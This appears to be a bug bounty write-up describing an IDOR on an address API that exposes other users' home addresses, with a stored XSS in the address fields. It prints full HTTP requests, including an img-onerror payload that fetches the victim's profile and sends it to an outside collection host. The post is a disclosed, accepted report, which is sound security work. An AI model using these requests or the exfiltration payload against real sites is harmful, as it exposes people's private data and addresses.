Idor: I know where you live

How we got there

This was a bug i found on one of my favourite programs.

basically this idor was like a three in one with a caveat;

  • to update your address the app asked you to get in touch with support; i was able to bypass this
  • the app also had idor that allowed read/write of other users addresses
  • the app had xss in the address fields

the caveat here was the idor, it existed with the requirement of you knew the users UUID.

  • however i had asked the program manager if they would be interested in this by sending a message in a previous report i had sent.

Reproduction;

  1. go to dash-sas.xboy.me/address and click on edit, a popup states that you get in touch with support want to change your info, reach us on 1234 123 0745 or [email protected].
  2. i did some recond and found the address update endpoint sas-api.xboy.me/users/*/
  3. fetch users addresses
GET /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
  1. add users address
POST /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "POC",
  "country": "POC",
  "country_code": "POC",
  "line": "POC",
  "postcode": "POC"
}
  1. Update an address
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "POC",
  "country": "POC",
  "country_code": "POC",
  "line": "POC",
  "postcode": "POC"
}
  1. Get XSS
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "country": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "country_code": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "line": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "postcode": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">"
}

Report

I sent a report to the program after recieving a go ahead. It was accepted as a medium cause UUID man.

basic

Contacts

@github @twitter @LinkedIn @Intigriti @hackerone_old

🔥🔥: 0

Previous Post

my-first

Next Post

TinderBug